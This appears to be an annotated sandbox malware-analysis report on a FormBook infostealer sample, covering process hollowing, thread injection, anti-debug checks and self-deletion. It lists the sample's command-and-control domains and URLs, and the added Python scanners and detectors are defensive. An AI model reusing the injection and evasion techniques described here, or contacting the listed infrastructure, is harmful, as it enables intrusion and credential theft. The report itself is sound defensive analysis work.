          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
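          The long run of "mov eax, dword ptr fs:[00000030h]" hits above is the evidence behind the "Contains functionality to read the PEB" signature. In a 32-bit (here WOW64) process FS points at the TEB; FS:[0x18] is the TEB self-pointer and FS:[0x30] is the PEB pointer, and every anti-debug check (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) and every manual Ldr walk used to resolve APIs without imports (PEB.Ldr at +0x0C) begins with exactly that load. 64-bit code reads GS:[0x60] instead, so the fs: form also tells you the unpacked FormBook payload is 32-bit, matching the SysWOW64 explorer.exe it hollows. The scanner below is an added example for this report, not code from the sandbox or the sample; it finds every encoding of `mov r32, dword ptr fs:[0x30]` / `fs:[0x18]` in a raw code blob and, where the next instruction dereferences the loaded register, names the PEB field. The byte sequence it runs on is constructed to contain one BeingDebugged check, one Ldr load and one TEB read.

```python
"""Scan raw 32-bit x86 code for reads of the PEB/TEB through the FS segment.

Added example for this report, not code from the sample or the sandbox.
The SAMPLE bytes at the bottom are constructed; the instruction encodings
and PEB offsets are the standard ones.
"""
from typing import Dict, List, Optional

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# FS slots a 32-bit process uses to reach its own control blocks.
FS_SLOTS = {0x30: "PEB", 0x18: "TEB self-pointer"}
# PEB32 fields typically read right after the pointer is loaded.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x10: "ProcessParameters", 0x68: "NtGlobalFlag"}


def _mov_fs_encodings(disp: int):
    """Yield (byte pattern, destination register index) for every
    'mov r32, dword ptr fs:[disp]' encoding."""
    d = disp.to_bytes(4, "little")
    yield b"\x64\xa1" + d, 0  # 64 A1 disp32: short form, EAX only
    for idx in range(8):
        modrm = bytes([0x05 | (idx << 3)])  # mod=00 rm=101 -> [disp32]; reg field = destination
        yield b"\x64\x8b" + modrm + d, idx  # 64 8B /r disp32


def _field_read_after(code: bytes, pos: int, base_reg: int) -> Optional[str]:
    """If code[pos:] is 'mov r32, [base_reg+disp8]' (8B) or
    'movzx r32, byte ptr [base_reg+disp8]' (0F B6), name the PEB field disp8 selects."""
    if code[pos:pos + 2] == b"\x0f\xb6":
        modrm_pos = pos + 2
    elif code[pos:pos + 1] == b"\x8b":
        modrm_pos = pos + 1
    else:
        return None
    if modrm_pos + 1 >= len(code):
        return None
    modrm = code[modrm_pos]
    mod, rm = modrm >> 6, modrm & 7
    # Need [reg+disp8] on the register just loaded; rm=4 would mean a SIB byte follows.
    if mod != 1 or rm == 4 or rm != base_reg:
        return None
    return PEB_FIELDS.get(code[modrm_pos + 1])


def find_fs_reads(code: bytes) -> List[Dict]:
    """Return every FS:[0x30] / FS:[0x18] read, sorted by offset, with the PEB
    field (if any) that the following instruction dereferences."""
    hits = []
    for disp, slot in FS_SLOTS.items():
        for pattern, reg_idx in _mov_fs_encodings(disp):
            start = 0
            while (off := code.find(pattern, start)) != -1:
                field = None
                if disp == 0x30:
                    field = _field_read_after(code, off + len(pattern), reg_idx)
                hits.append({
                    "offset": off,
                    "insn": f"mov {REGS[reg_idx]}, dword ptr fs:[{disp:#04x}]",
                    "slot": slot,
                    "field": field,
                })
                start = off + 1
    return sorted(hits, key=lambda h: h["offset"])


# Constructed sample: a BeingDebugged check, an Ldr load and a TEB read.
SAMPLE = bytes.fromhex(
    "64a130000000"    # mov eax, dword ptr fs:[30h]   ; PEB
    "0fb64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85c0"            # test eax, eax
    "648b0d30000000"  # mov ecx, dword ptr fs:[30h]   ; PEB
    "8b410c"          # mov eax, dword ptr [ecx+0Ch]  ; PEB.Ldr
    "648b1518000000"  # mov edx, dword ptr fs:[18h]   ; TEB self-pointer
    "9090c3"          # nop; nop; ret
)

if __name__ == "__main__":
    for h in find_fs_reads(SAMPLE):
        extra = f" -> PEB.{h['field']}" if h["field"] else ""
        print(f"{h['offset']:#06x}: {h['insn']} ({h['slot']}){extra}")
```

Run over the unpacked payload (for example the `1.2.PO.exe.400000.0.unpack` artefact listed later in this report) rather than the packed file: the packer's stub has few or none of these reads, which is why the sandbox only reports them for process 1 and the hollowed explorer.exe. Hits that chain straight into BeingDebugged or NtGlobalFlag are anti-debug; hits that chain into Ldr are usually the start of an export-walking API resolver.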

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.cwyxonlp.icu
          Source: C:\Windows\explorer.exe | Domain query: www.phorice.com
          Source: C:\Windows\explorer.exe | Domain query: www.websiteworlda-z.com
          Source: C:\Windows\explorer.exe | Network Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exe | Network Connect: 194.117.254.63 80
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_73351000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PO.exe | Section loaded: unknown target: C:\Users\user\Desktop\PO.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PO.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\PO.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PO.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\PO.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 900000
          Source: C:\Users\user\Desktop\PO.exe | Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.511285209.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
          Source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp | Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000003.00000002.497174313.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
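          Read together, the evasion section above describes one chain: PO.exe re-launches itself and hollows the copy, injects into the real C:\Windows\explorer.exe (APC queue, section mapped with execute permission), starts a 32-bit C:\Windows\SysWOW64\explorer.exe whose image it unmaps at base 900000, and that hollowed explorer.exe then runs cmd.exe /c del on the original file while the injected 64-bit explorer.exe resolves the C2 domains and connects out on port 80. None of those steps needs a kernel driver or an exploit, so host telemetry (process creation, DNS and network events) is enough to catch them. The correlation below is an added example for this report, not sandbox or FormBook code: it applies three rules to a small event stream (a shell process touching the network, a process creating a copy of itself, and cmd.exe deleting a binary that has already run under this session). The event schema is a loose Sysmon-like one chosen here; the EVENTS list is constructed from values on this page plus two benign events so that the rules can be seen not to fire.

```python
"""Correlate process, DNS and network events into the three behaviours the
report lists under HIPS / PFW / OS protection evasion.

Added example for this report, not sandbox or FormBook code. The event
dictionaries follow a loose Sysmon-like schema chosen here; EVENTS is
constructed from values on this page plus two benign events.
"""
import ipaddress
import re
from typing import Dict, List

# Images that should not be resolving names or opening sockets to public
# addresses on their own. Assumed baseline for the example; explorer.exe does
# make some Microsoft-bound connections on real hosts, so allowlist those.
SYSTEM_IMAGES = {"explorer.exe"}

# "cmd.exe /c del 'C:\path\file.exe'" with or without quotes around the path.
DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+)['\"]?", re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events: List[Dict]) -> List[str]:
    """Return one alert string per rule hit, in event order."""
    alerts: List[str] = []
    seen_images = set()  # every image that has actually executed so far
    for ev in events:
        image, name = ev["image"], _name(ev["image"])
        if ev["event"] == "ProcessCreate":
            seen_images.add(image.lower())
            parent = ev["parent_image"]
            # Rule 1: a process launching a second copy of itself is the usual
            # first step of self-hollowing (suspended child, unmap, write, resume).
            if _name(parent) == name:
                alerts.append(f"self-spawn: {parent} created a copy of itself (hollowing set-up)")
            # Rule 2: cmd.exe /c del of a binary that already ran = self-deletion.
            m = DEL_RE.search(ev.get("cmdline", ""))
            if name == "cmd.exe" and m:
                target = m.group(1).strip()
                if target.lower() in seen_images:
                    alerts.append(f"self-delete: {parent} removes previously executed {target}")
        # Rule 3: shell process doing DNS or talking to a public address.
        elif ev["event"] == "DnsQuery" and name in SYSTEM_IMAGES:
            alerts.append(f"system process DNS: {image} -> {ev['query']}")
        elif ev["event"] == "NetworkConnect" and name in SYSTEM_IMAGES:
            if not ipaddress.ip_address(ev["dst_ip"]).is_private:
                alerts.append(f"system process connect: {image} -> {ev['dst_ip']}:{ev['dst_port']}")
    return alerts


# Constructed event stream mirroring the report's process tree and C2 traffic.
EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Users\user\Desktop\PO.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"'C:\Users\user\Desktop\PO.exe'"},
    {"event": "ProcessCreate", "image": r"C:\Users\user\Desktop\PO.exe",
     "parent_image": r"C:\Users\user\Desktop\PO.exe", "cmdline": r"'C:\Users\user\Desktop\PO.exe'"},
    {"event": "DnsQuery", "image": r"C:\Windows\explorer.exe", "query": "www.cwyxonlp.icu"},
    {"event": "NetworkConnect", "image": r"C:\Windows\explorer.exe",
     "dst_ip": "44.227.76.166", "dst_port": 80},
    # benign: the shell browsing a LAN file share
    {"event": "NetworkConnect", "image": r"C:\Windows\explorer.exe",
     "dst_ip": "192.168.1.10", "dst_port": 445},
    {"event": "ProcessCreate", "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\PO.exe'"},
    # benign: a user-launched cmd that deletes nothing
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for line in analyze(EVENTS):
        print(line)
```

Two points the report's own data adds to these rules. First, the deleting parent is C:\Windows\SysWOW64\explorer.exe, a 32-bit explorer started by the sample, not the user's 64-bit shell at C:\Windows\explorer.exe; on a 64-bit host an explorer.exe image under SysWOW64 is itself worth a rule. Second, the Section unmapped / Thread register set / Thread APC queued lines are what the hollowing looks like from the kernel side (NtUnmapViewOfSection, SetThreadContext, QueueUserAPC); the self-spawn rule here is the cheap proxy for that when only process-creation telemetry is available.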

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE
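Every FormBook hit above is a memory dump or an unpacked region, and the dump names say in which process, at which address and with which page protection the payload was found. The following is an added triage helper, not code from the report or from Joe Sandbox: it parses the eight .sdmp names listed above under an assumed field layout (process index, dump stage, sequence number, base address, Win32 page protection, one further field this example does not interpret). That layout is inferred from the report's own unpack names such as 1.2.PO.exe.400000.0.unpack and is not documented on the page; the PAGE_* constants themselves are the standard winnt.h values. Read this way, process 0 holds the payload only in a PAGE_READWRITE buffer at 0x2670000, process 1 holds it at the image base 0x400000 with PAGE_EXECUTE_READWRITE, and process 10 (explorer.exe) holds it in two RWX regions, which is the footprint of a loader staging a payload, writing it over a hollowed copy of itself and then injecting it into explorer.exe.

```python
import re
from dataclasses import dataclass

# Win32 page-protection constants from winnt.h (standard values).
PAGE_PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# Assumed layout of a Joe Sandbox .sdmp name (an inference from the report's
# own unpack names, not documented on the page):
#   <process index>.<dump stage>.<sequence>.<base address>.<page protection>.<extra>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp$"
)
# Matching unpack name: <process>.<stage>.<image>.<base>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.\d+(?:\.raw)?\.unpack$")


@dataclass(frozen=True)
class DumpRef:
    process: int
    stage: int
    base: int
    protect: int
    extra: int


def parse_dump_name(name: str) -> DumpRef:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a .sdmp name: {name!r}")
    return DumpRef(process=int(m["proc"], 16), stage=int(m["stage"], 16),
                   base=int(m["base"], 16), protect=int(m["protect"], 16),
                   extra=int(m["extra"], 16))


def protect_name(protect: int) -> str:
    # The low byte is the access class; PAGE_GUARD / NOCACHE / WRITECOMBINE
    # are modifier bits above it.
    return PAGE_PROTECT_NAMES.get(protect & 0xFF, f"0x{protect:X}")


def is_executable(ref: DumpRef) -> bool:
    return bool(ref.protect & EXECUTABLE_MASK)


def unpack_name_matches(ref: DumpRef, unpack_name: str) -> bool:
    """True if an UNPACKEDPE name refers to the same process, stage and base
    as a memory dump, so the two hit lists can be cross-checked."""
    m = UNPACK_RE.match(unpack_name.strip())
    return bool(m) and int(m["proc"]) == ref.process and \
        int(m["stage"]) == ref.stage and int(m["base"], 16) == ref.base


def triage(names):
    """Group hits by process index and split them into executable regions
    (payload unpacked in place or injected) versus plain data buffers."""
    report = {}
    for n in names:
        ref = parse_dump_name(n)
        entry = report.setdefault(ref.process, {"executable": [], "data": []})
        bucket = "executable" if is_executable(ref) else "data"
        entry[bucket].append((f"0x{ref.base:X}", protect_name(ref.protect)))
    return report


# The eight memory-dump hits from the Yara section of this report.
YARA_DUMPS = [
    "00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp",
    "00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp",
    "0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp",
    "00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp",
    "00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp",
    "00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp",
    "0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp",
    "0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for proc, buckets in sorted(triage(YARA_DUMPS).items()):
        print(f"process {proc}: executable={buckets['executable']} data={buckets['data']}")
```

A hit in a PAGE_EXECUTE_READWRITE region at a process's image base is the one to extract first: it is the unpacked payload as it ran, and it lines up with the 1.2.PO.exe.400000.0.unpack entry that the scanners below flag at 100%.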

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File sources: the same eight memory dumps and six unpacked PE files listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

The matrix is given here one tactic per line. A number in parentheses is the badge count the report prints next to a technique; cells without a count are unmatched placeholders from the matrix template.

Initial Access: Valid Accounts / Default Accounts / Domain Accounts / Local Accounts / Cloud Accounts / Replication Through Removable Media
Execution: Native API (1) / Shared Modules (1) / At (Linux) / At (Windows) / Cron / Launchd
Persistence: Path Interception / Boot or Logon Initialization Scripts / Logon Script (Windows) / Logon Script (Mac) / Network Logon Script / Rc.common
Privilege Escalation: Process Injection (612) / Boot or Logon Initialization Scripts / Logon Script (Windows) / Logon Script (Mac) / Network Logon Script / Rc.common
Defense Evasion: Rootkit (1) / Virtualization/Sandbox Evasion (3) / Process Injection (612) / Deobfuscate/Decode Files or Information (1) / Obfuscated Files or Information (3) / Software Packing (11)
Credential Access: Credential API Hooking (1) / LSASS Memory / Security Account Manager / NTDS / LSA Secrets / Cached Domain Credentials
Discovery: Security Software Discovery (241) / Virtualization/Sandbox Evasion (3) / Process Discovery (2) / Remote System Discovery (1) / File and Directory Discovery (2) / System Information Discovery (12)
Lateral Movement: Remote Services / Remote Desktop Protocol / SMB/Windows Admin Shares / Distributed Component Object Model / SSH / VNC
Collection: Credential API Hooking (1) / Archive Collected Data (1) / Clipboard Data (1) / Input Capture / Keylogging / GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium / Exfiltration Over Bluetooth / Automated Exfiltration / Scheduled Transfer / Data Transfer Size Limits / Exfiltration Over C2 Channel
Command and Control: Encrypted Channel (1) / Ingress Tool Transfer (4) / Non-Application Layer Protocol (3) / Application Layer Protocol (13) / Fallback Channels / Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication / Exploit SS7 to Redirect Phone Calls/SMS / Exploit SS7 to Track Device Location / SIM Card Swap / Manipulate Device Communication / Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization / Remotely Wipe Data Without Authorization / Obtain Device Cloud Backups / Carrier Billing Fraud / Manipulate App Store Rankings or Ratings / Abuse Accessibility Features
Impact: System Shutdown/Reboot (1) / Device Lockout / Delete Device Data

Behavior Graph

Behavior Graph ID: 383905 | Sample: PO.exe | Start date: 08/04/2021 | Architecture: WINDOWS | Score: 100

The graph is given here as a process tree. A number in parentheses after a process name is the badge the graph draws next to it, kept as printed.

• Start: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 4 other signatures
  • PO.exe (18), started
    • Dropped file: C:\Users\user\AppData\Local\...\5t94xwjj.dll, PE32
    • Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
    • PO.exe, started
      • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      • explorer.exe, injected
        • DNS/IP: www.websiteworlda-z.com (194.117.254.63, local port 49693 to remote port 80, UDMEDIA-ASDE, Germany); www.phorice.com; 2 other IPs or domains
        • Signatures: System process connects to network (likely due to code injection or exploit)
        • explorer.exe, started
          • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (1), started
            • conhost.exe, started

Screenshots

(Thumbnail screenshots of the analysis desktop; not reproduced here.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
PO.exe | 17% | ReversingLabs | Win32.Spyware.Noon

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll | 10% | ReversingLabs | Win32.PUA.Wacapew

The ns….tmp directory under %TEMP% is the plugin-extraction folder an NSIS installer creates at run time, so the dropped DLL is the NSIS loader stage, not the FormBook body: the FormBook Yara rule matched only memory dumps and unpacked regions, never this file.

Unpacked PE Files

Source | Detection | Scanner | Label
10.2.explorer.exe.51af834.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.PO.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
10.2.explorer.exe.900000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.PO.exe.2670000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.PO.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.PO.exe.28b0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
www.c-voyageinc.com/r4ei/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (3 entries) | safe
http://phorice.com | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation (3 entries) | safe
http://www.goodfont.co.kr | 0% | URL Reputation (3 entries) | safe
http://www.carterandcone.coml | 0% | URL Reputation (3 entries) | safe
http://www.sajatypeworks.com | 0% | URL Reputation (3 entries) | safe
http://www.typography.netD | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (3 entries) | safe
http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (3 entries) | safe
http://fontfabrik.com | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cn | 0% | URL Reputation (3 entries) | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (3 entries) | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (3 entries) | safe
http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation (3 entries) | safe
http://www.urwpp.deDPlease | 0% | URL Reputation (3 entries) | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation (3 entries) | safe
http://www.sakkal.com | 0% | URL Reputation (3 entries) | safe

Only the three /r4ei/ URLs and phorice.com belong to the sample. The remaining entries were read from explorer.exe's own memory (see URLs from Memory and Binaries below) and are font-foundry and license strings, several with over-read trailing characters (coml, netD, DPlease, bThe). The 0% / safe verdicts on the /r4ei/ URLs mean only that the reputation services had not yet seen them; the sandbox itself marks them malicious under Contacted URLs.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.websiteworlda-z.com | 194.117.254.63 | true | true | | unknown
pixie.porkbun.com | 44.227.76.166 | true | false | | high
www.cwyxonlp.icu | unknown | unknown | true | | unknown
www.phorice.com | unknown | unknown | true | | unknown

pixie.porkbun.com is reported non-malicious with high reputation and recurs across many unrelated samples in the Joe Sandbox View / Context section below; the three www.* names marked malicious are the sample's own infrastructure.

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.c-voyageinc.com/r4ei/ | true | Avira URL Cloud: safe | low
http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f | true | Avira URL Cloud: safe | unknown
http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f | true | Avira URL Cloud: safe | unknown
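The three contacted URLs share the path /r4ei/ and the trailing pair GzuLH=VBZLTBc0f across different hosts, while _ZA0p2 carries a different base64-alphabet blob on each host. That split between constant and per-host parts is the pivot an analyst uses to find further hosts of the same campaign in proxy logs. The following is an added example, not code from the report: it clusters URLs by path and separates the query pairs that are constant across hosts from the keys whose value changes. The clustering thresholds and the base64-alphabet heuristic are this example's own, and the input list is the report's three URLs copied verbatim.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Standard base64 alphabet with optional padding; 16 is an arbitrary minimum
# length chosen for this example to skip short tokens.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def split_url(url: str):
    """Return (host, path, [(key, value), ...]). The query is split by hand so
    that '+' and '=' inside values survive; urllib's parse_qs would turn '+'
    into a space and treat '=' as a separator."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    params = []
    if parts.query:
        for item in parts.query.split("&"):
            key, _, value = item.partition("=")
            params.append((key, value))
    return (parts.hostname or "").lower(), parts.path, params


def cluster_by_path(urls):
    """Group URLs by path. Inside each group, a key=value pair seen on two or
    more hosts is 'fixed' (campaign constant); a key seen on two or more hosts
    with differing values is 'variable' (per-victim slot)."""
    groups = defaultdict(lambda: {"hosts": set(),
                                  "pairs": defaultdict(set),
                                  "keys": defaultdict(set)})
    for url in urls:
        host, path, params = split_url(url)
        g = groups[path]
        g["hosts"].add(host)
        for key, value in params:
            g["pairs"][(key, value)].add(host)
            g["keys"][key].add(host)

    result = {}
    for path, g in groups.items():
        fixed = {k: v for (k, v), hosts in g["pairs"].items() if len(hosts) >= 2}
        variable = sorted(k for k, hosts in g["keys"].items()
                          if len(hosts) >= 2 and k not in fixed)
        # A variable key whose every value is a long base64-alphabet string is
        # the slot that carries an encoded per-host payload.
        blob_keys = sorted(
            k for k in variable
            if all(B64_RE.match(v) for (kk, v) in g["pairs"] if kk == k)
        )
        result[path] = {"hosts": sorted(g["hosts"]), "fixed_params": fixed,
                        "variable_keys": variable, "blob_keys": blob_keys}
    return result


# The three URLs listed under Contacted URLs in this report.
CONTACTED_URLS = [
    "www.c-voyageinc.com/r4ei/",
    "http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f",
    "http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f",
]

if __name__ == "__main__":
    for path, info in cluster_by_path(CONTACTED_URLS).items():
        print(path, info)
```

Searching proxy logs for the path together with the fixed pair (here /r4ei/ and GzuLH=VBZLTBc0f) finds the campaign's other hosts even when the domains themselves are new; matching on the variable blob would miss them, since that value differs per victim.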

URLs from Memory and Binaries

Unless noted otherwise the source is explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp, and no entry is marked malicious.

Name | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | | high
http://www.fontbureau.com | | high
http://www.fontbureau.com/designersG | | high
http://www.fontbureau.com/designers/? | | high
http://www.founder.com.cn/cn/bThe | URL Reputation: safe (3 entries) | unknown
http://phorice.com (source: explorer.exe, 0000000A.00000002.504257510.000000000569F000.00000004.00000001.sdmp) | Avira URL Cloud: safe | unknown
